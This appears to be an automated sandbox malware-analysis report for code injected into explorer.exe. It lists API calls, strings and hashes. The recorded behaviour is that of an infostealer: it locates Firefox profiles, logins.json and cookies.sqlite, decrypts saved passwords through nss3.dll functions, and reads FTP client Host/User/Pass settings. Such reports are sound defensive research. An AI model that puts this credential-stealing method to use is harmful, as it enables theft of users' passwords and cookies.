                                  • Opcode Fuzzy Hash: d8da52ebf54bab53ae3ca41385c84507770efb2167d087fcb706d6c52b73b34a
                                  • Instruction Fuzzy Hash: D3F0BB3670064817D611752ACC84EE7368EEFD53A67160029F49993242DF676C425374
                                  APIs
                                  • RtlAllocateHeap.NTDLL(02610000,00000000,?), ref: 00089EB5
                                  Strings
                                  • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00089ECD
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                  • API String ID: 1279760036-667713680
                                  • Opcode ID: 571bb11c0abf0816024da647f261a0c95338da32ac75e42e57d66a358eef1667
                                  • Instruction ID: 6d0ecc66742d84c592a4f73b3664b1b7ebf4e9bfc3f597e36e2858d6c86bab0f
                                  • Opcode Fuzzy Hash: 571bb11c0abf0816024da647f261a0c95338da32ac75e42e57d66a358eef1667
                                  • Instruction Fuzzy Hash: 48E0C2336082507BD2123798AC45FBFBB69EB94F50F090025FA44BA665C2789C0187A3
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                  • CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: CloseCreateFileHandle
                                  • String ID:
                                  • API String ID: 3498533004-0
                                  • Opcode ID: eb43647509e1e4959db50d8f341f5a13d07f2a5c4a231fd9d802d1b51a62afd6
                                  • Instruction ID: 8967703e6551b72cc132f61c34cb4fc831c410cbcc874edd5a13349f8287a700
                                  • Opcode Fuzzy Hash: eb43647509e1e4959db50d8f341f5a13d07f2a5c4a231fd9d802d1b51a62afd6
                                  • Instruction Fuzzy Hash: 96D0E2B125363062E5B526257C08EE76E5CAF02AB5B080626BA9D95090E629888782E0
                                  APIs
                                  • HeapFree.KERNEL32(02610000,00000000,?), ref: 00089EF8
                                  Strings
                                  • failed to HeapFree block %p (%lu), heap=%p, xrefs: 00089F0E
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: failed to HeapFree block %p (%lu), heap=%p
                                  • API String ID: 3298025750-4030396798
                                  • Opcode ID: 12b465bb088f3113cd471a2dd04985769108c502fa93156c4168459b9eba0620
                                  • Instruction ID: 72a351b7fcbe53219eb4fa4a00916c69a200bf7d54dc485bfead5e0c0727eb3b
                                  • Opcode Fuzzy Hash: 12b465bb088f3113cd471a2dd04985769108c502fa93156c4168459b9eba0620
                                  • Instruction Fuzzy Hash: 52D0C232208240B7E2013B509C41F3B777DAB94F00F4C0029F354A9467D2789441AB22
                                  APIs
                                    • Part of subcall function 00081162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0008116F
                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
                                  • HeapFree.KERNEL32(00000000), ref: 00081027
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcessQueryVirtual
                                  • String ID:
                                  • API String ID: 2580854192-0
                                  • Opcode ID: 4eef8bc90a0115e1a74d84085bfb8a5dca21e42519d300382b8c9dff5260257b
                                  • Instruction ID: 5ce1e110c10a9ede8fa499c3b28381eecf3aac34fcf651ed23811ac42075f2bd
                                  • Opcode Fuzzy Hash: 4eef8bc90a0115e1a74d84085bfb8a5dca21e42519d300382b8c9dff5260257b
                                  • Instruction Fuzzy Hash: 3AC04C7540627056D9A037A47D0DBCA2B5DEF49362F090442B94697152CAAA8C4287B0
                                  APIs
                                  • RtlZeroMemory.NTDLL(?,00000018), ref: 000812B5
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryZero
                                  • String ID:
                                  • API String ID: 816449071-0
                                  • Opcode ID: b063bd152322d9604de73742df269dbb7a13d3f582f0240a776bd5140e3242e5
                                  • Instruction ID: 14c05a8ab06494b0ae547c37f8bfa808a2e10712437e9a35d7c301f943bfb637
                                  • Opcode Fuzzy Hash: b063bd152322d9604de73742df269dbb7a13d3f582f0240a776bd5140e3242e5
                                  • Instruction Fuzzy Hash: BC11E6B5A01209AFEB10EFA5D984AEEB7FCFF08341B14402AFD45E3241D7359A01CB60
                                  APIs
                                  • GetFileAttributesExW.KERNELBASE(00000000,00000000,?,?,00000000,-00080006), ref: 0008B848
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 253653adaefd223fbb8662ff93d56f4a9bd32f1c0072db9f85219bdcfa108373
                                  • Instruction ID: 918e8a1a8635a5898706c2da4a37bb00d924ac56ebc7212c3da473aa57b161de
                                  • Opcode Fuzzy Hash: 253653adaefd223fbb8662ff93d56f4a9bd32f1c0072db9f85219bdcfa108373
                                  • Instruction Fuzzy Hash: 10F09631A0421CDADB20AABE9C44AEEF7ECEB49764F104226E955E2091EB708D05C7D5
                                  APIs
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00081684
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID:
                                  • API String ID: 2244384528-0
                                  • Opcode ID: fb4c7f087d85d2d63b4df43d6836f5551ef695e3cca08a44398b5e6e88bfccad
                                  • Instruction ID: 1aa3336bd32c6042c164ad73d0f7d071ef6f1d2de0bbdc4326f5a1605f10dd89
                                  • Opcode Fuzzy Hash: fb4c7f087d85d2d63b4df43d6836f5551ef695e3cca08a44398b5e6e88bfccad
                                  • Instruction Fuzzy Hash: FBC012301212219EE7602B208C09B8627D8AF197A2F06092AA8C19A080E2A908C08AA0
                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0008158A), ref: 00081056
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 95ebccbb62652008143a9f0522e465b2c08813a599faf1d21dc5491d365e052f
                                  • Instruction ID: 33199f922d5af04a34751f0835a7a6930012b223197b71027ff47a41be215880
                                  • Opcode Fuzzy Hash: 95ebccbb62652008143a9f0522e465b2c08813a599faf1d21dc5491d365e052f
                                  • Instruction Fuzzy Hash: 76A002F07D63007AFD695762AE1FF162E389740F02F100245B70D7C0D095E97500853D
                                  APIs
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00084A5B,?,?,00000000,?,?,?,?,00084B66,?), ref: 00081065
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 8cc8155a45e5bdf3d6ecbf97db3d338031fe5cd3e4b13a83c9c05cbe19853f49
                                  • Instruction ID: bdaa146f7cbaa874197a4f7c39aada78053c5e51522d3c5a0494c2ac97adf33b
                                  • Opcode Fuzzy Hash: 8cc8155a45e5bdf3d6ecbf97db3d338031fe5cd3e4b13a83c9c05cbe19853f49
                                  • Instruction Fuzzy Hash: A1A0027469170066FDB457205D0AF0527146740B01F244545B641A90D18DAAF0448A28
                                  APIs
                                  • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000834C0
                                    • Part of subcall function 000833C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00083401
                                  • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,000837A8), ref: 000834E9
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0008351E
                                  • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00083541
                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00083586
                                  • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0008358F
                                  • lstrcmpiW.KERNEL32(00000000,File), ref: 000835B6
                                  • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 000835DE
                                  • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000835F6
                                  • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00083606
                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0008361E
                                  • GetFileSize.KERNEL32(?,00000000), ref: 00083631
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00083658
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0008366B
                                  • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00083681
                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 000836AD
                                  • CloseHandle.KERNEL32(?), ref: 000836C0
                                  • CloseHandle.KERNEL32(00000000), ref: 000836F5
                                    • Part of subcall function 00081C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00081CC0
                                    • Part of subcall function 00081C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00081CDA
                                    • Part of subcall function 00081C9F: CloseHandle.KERNEL32(00000000), ref: 00081CE6
                                  • CloseHandle.KERNEL32(?), ref: 00083707
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                  • String ID: File
                                  • API String ID: 3915112439-749574446
                                  • Opcode ID: 3a99b0d4a6b470b356a7520aeec362765019e2a7e87d638d3ccb8974909f4689
                                  • Instruction ID: 412b44e0d8d00dc2ce491ec342da3a435bd6f6606e26b2718310f2f2a6e93c77
                                  • Opcode Fuzzy Hash: 3a99b0d4a6b470b356a7520aeec362765019e2a7e87d638d3ccb8974909f4689
                                  • Instruction Fuzzy Hash: A661B170204301AFE720AF24CC44B6BBBE9FF88B51F140829F986D62A1D776DA558F61
                                  APIs
                                  • memcmp.NTDLL ref: 000D4502
                                  • memcmp.NTDLL ref: 000D475F
                                  • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 000D4803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: memcmp$memcpy
                                  • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                  • API String ID: 231171946-1096842476
                                  • Opcode ID: 469582fbedf0ab11c86b6fdba566557ccccaf4d4e3592e5a386a2dc547f3de42
                                  • Instruction ID: ce351308a1f908dedbf48f95169a9ae32f1a57fce0a675a91a38d0dcd2b7ab44
                                  • Opcode Fuzzy Hash: 469582fbedf0ab11c86b6fdba566557ccccaf4d4e3592e5a386a2dc547f3de42
                                  • Instruction Fuzzy Hash: 7BC1F170A087828BDB74CF18D49077ABBE1AF9A314F14056FF8DA87342D734D8458B66
                                  APIs
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 00082B3D
                                  • lstrcmpiW.KERNEL32(?,000D62CC), ref: 00082B63
                                  • lstrcmpiW.KERNEL32(?,000D62D0), ref: 00082B7B
                                    • Part of subcall function 000819B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00082CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000819C4
                                  • StrStrIW.SHLWAPI(00000000,logins.json), ref: 00082BE7
                                  • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00082C16
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00082C43
                                  • FindClose.KERNEL32(00000000), ref: 00082C52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                  • String ID: \*.*$cookies.sqlite$logins.json
                                  • API String ID: 1108783765-3717368146
                                  • Opcode ID: 67bd7f795d4da5c9da4fb34461ee4484b492469efacdc514854bb532df0e0015
                                  • Instruction ID: e9e77636caf6dfbb37d4ac2b1a91f531cade9ce0109eeec82bb3336aa8a7f2d7
                                  • Opcode Fuzzy Hash: 67bd7f795d4da5c9da4fb34461ee4484b492469efacdc514854bb532df0e0015
                                  • Instruction Fuzzy Hash: 60318C303053015B9A14BB709899ABE77DABF84700B04492EF9C6D7283EF7AC9469762
                                  APIs
                                    • Part of subcall function 00086AAA: memset.NTDLL ref: 00086AC5
                                  • memset.NTDLL ref: 000A5F53
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: memset
                                  • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                  • API String ID: 2221118986-594550510
                                  • Opcode ID: 5320a1aa9eaddf7819d17075fcba68c20f18865c2da46462d93fd945543395bf
                                  • Instruction ID: c7ec09d7f9e119365fbf557bf23094a0b96bd21b70c7e2f6e443a934cfb2af9d
                                  • Opcode Fuzzy Hash: 5320a1aa9eaddf7819d17075fcba68c20f18865c2da46462d93fd945543395bf
                                  • Instruction Fuzzy Hash: 5BC18E716047019FCB54DF65C480A6BB7F2BF89700F18892EF8998B242DB36DD56CB92
                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00082127
                                  • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0008213A
                                  • wsprintfA.USER32 ref: 0008214F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                  • String ID: %li
                                  • API String ID: 4120667308-1021419598
                                  • Opcode ID: c9dfe0ce2e226fb95f3959033191fbdb1a327d87d8ca9ea0e9cd7d0578bc45ca
                                  • Instruction ID: 464f19cd6c1ac757aedf0073579f65f9fcc87417aee82f84cc687bb841d95db3
                                  • Opcode Fuzzy Hash: c9dfe0ce2e226fb95f3959033191fbdb1a327d87d8ca9ea0e9cd7d0578bc45ca
                                  • Instruction Fuzzy Hash: 5DE0923264121877D7203BA89C06EEF7B6CDB40B16F040192FE00A6286D9635A6487E5
                                  APIs
                                  • CoCreateInstance.OLE32(000D62B0,00000000,00000001,000D62A0,?), ref: 0008445F
                                  • SysAllocString.OLEAUT32(?), ref: 000844AA
                                  • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0008456E
                                  • lstrcmpiW.KERNEL32(Servers,?), ref: 0008457D
                                  • lstrcmpiW.KERNEL32(Settings,?), ref: 0008458C
                                    • Part of subcall function 000811E1: lstrlenW.KERNEL32(?,7570D5B5,00000000,?,00000000,?,000846E3), ref: 000811ED
                                    • Part of subcall function 000811E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0008120F
                                    • Part of subcall function 000811E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00081231
                                  • lstrcmpiW.KERNEL32(Server,?), ref: 000845BE
                                  • lstrcmpiW.KERNEL32(LastServer,?), ref: 000845CD
                                  • lstrcmpiW.KERNEL32(Host,?), ref: 00084657
                                  • lstrcmpiW.KERNEL32(Port,?), ref: 00084679
                                  • lstrcmpiW.KERNEL32(User,?), ref: 0008469F
                                  • lstrcmpiW.KERNEL32(Pass,?), ref: 000846C5
                                  • wsprintfW.USER32 ref: 0008471E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                  • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                  • API String ID: 2230072276-1234691226
                                  • Opcode ID: 3376d7830466d4f392724e7ed64b5d40cf53d611acc9bcdd8da55ad2bc886472
                                  • Instruction ID: 6fa7439c074e0e3adb43b0ca838f63fede25847a527bcff0c6dbe556fddf17e0
                                  • Opcode Fuzzy Hash: 3376d7830466d4f392724e7ed64b5d40cf53d611acc9bcdd8da55ad2bc886472
                                  • Instruction Fuzzy Hash: CDB10971208302AFD740EF64C884E6AB7E9FFC9755F00895CF5858B260DB72E806CB62
                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • Part of subcall function 00081090: lstrlenW.KERNEL32(?,?,00000000,000817E5), ref: 00081097
                                    • Part of subcall function 00081090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 000810A8
                                    • Part of subcall function 000819B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00082CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000819C4
                                  • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00082503
                                  • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0008250A
                                  • LoadLibraryW.KERNEL32(00000000), ref: 00082563
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00082570
                                  • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00082591
                                  • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0008259E
                                  • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 000825AB
                                  • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 000825B8
                                  • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 000825C5
                                  • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 000825D2
                                  • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 000825DF
                                    • Part of subcall function 0008190B: lstrlen.KERNEL32(?,?,?,?,00000000,00082783), ref: 0008192B
                                    • Part of subcall function 0008190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00082783), ref: 00081930
                                    • Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,?), ref: 00081946
                                    • Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,00000000), ref: 0008194A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                  • API String ID: 3366569387-3272982511
                                  • Opcode ID: 0db36531a46e31402c1dd5630552be119792c2454c9f4c8c29a6555ac291f582
                                  • Instruction ID: a7b2f55276dc6ac50742344987b6cea75d31b9ec158fb1cb6e5e99546c7f3b94
                                  • Opcode Fuzzy Hash: 0db36531a46e31402c1dd5630552be119792c2454c9f4c8c29a6555ac291f582
                                  • Instruction Fuzzy Hash: 87411731A043459BDB14BB759C945EE3BE9BF85B41700003FE8C1AB392DB798C428FA1
                                  APIs
                                    • Part of subcall function 00085BF5: memset.NTDLL ref: 00085C07
                                  • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000860E1
                                  • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000860EC
                                  • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00086113
                                  • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0008618E
                                  • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000861B5
                                  • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000861C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: _alldiv$_allrem$memset
                                  • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                  • API String ID: 2557048445-1989508764
                                  • Opcode ID: 13b2ebc93722260598afb2851c972d3b21a4786601c7d085fc2222c1bc1ec27f
                                  • Instruction ID: 03fa02d3f8a719d05051c4cd3801ad853ace6c955944cf10748c41d0e2873fd6
                                  • Opcode Fuzzy Hash: 13b2ebc93722260598afb2851c972d3b21a4786601c7d085fc2222c1bc1ec27f
                                  • Instruction Fuzzy Hash: CDB18EB1908B429BD735BE24CC85B3B7FD4FB40345F250699F9C2A6293EA22CD108795
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: memcmp
                                  • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                  • API String ID: 1475443563-3683840195
                                  • Opcode ID: 4a8a2c4b92b206e84d1ba56d33b102cd6b946ca4f1cce0085908098517f16554
                                  • Instruction ID: f8638983eaaee7809f1050d377c2d4bc75db0ae36d20404bd335ad5730879edd
                                  • Opcode Fuzzy Hash: 4a8a2c4b92b206e84d1ba56d33b102cd6b946ca4f1cce0085908098517f16554
                                  • Instruction Fuzzy Hash: 81513631548700ABCB20DF64DC41AABB3E5FF45700F14896BFA958B242E771ED05EBA2
                                  APIs
                                  • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 00082AD2
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 000829E1
                                  • lstrlen.KERNEL32(00000000), ref: 000829EC
                                  • wsprintfA.USER32 ref: 00082A38
                                  • lstrlen.KERNEL32(00000000), ref: 00082A44
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00082A6C
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00082A99
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                  • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                  • API String ID: 304071051-2605711689
                                  • Opcode ID: 937e8feedcaa13e8e682da5f49011108d7c6ef680d76c4f8f3e7050302dc4e1f
                                  • Instruction ID: abc7e99e80b7944e8c50556b14567379447db6d12a69f2c55adc012d86cb8399
                                  • Opcode Fuzzy Hash: 937e8feedcaa13e8e682da5f49011108d7c6ef680d76c4f8f3e7050302dc4e1f
                                  • Instruction Fuzzy Hash: AC516F306083469BD725FF209851A7E7BDABF85305F04482DF9C59B253DB39DC468B62
                                  APIs
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                    • Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                  • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00082D13
                                  • StrStrIW.SHLWAPI(00000000,Profile), ref: 00082D45
                                  • GetPrivateProfileStringW.KERNEL32(00000000,Path,000D637C,?,00000FFF,?), ref: 00082D68
                                  • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00082D7B
                                  • lstrlenW.KERNEL32(00000000), ref: 00082DD8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                  • String ID: IsRelative$Path$Profile$profiles.ini
                                  • API String ID: 2234428054-4107377610
                                  • Opcode ID: 1910aacd158bad459efd24714dfcbf82a14fa5d51a064646f64bad5c31318d54
                                  • Instruction ID: d0ec9b20c8ca92714faf777618d1b70af53ee0a0b71a422be70b8ac64c31e16e
                                  • Opcode Fuzzy Hash: 1910aacd158bad459efd24714dfcbf82a14fa5d51a064646f64bad5c31318d54
                                  • Instruction Fuzzy Hash: D73160346043015BD754BF709C516AF7BE6BFC8700F14442EF986AB292DF7A8C869B52
                                  APIs
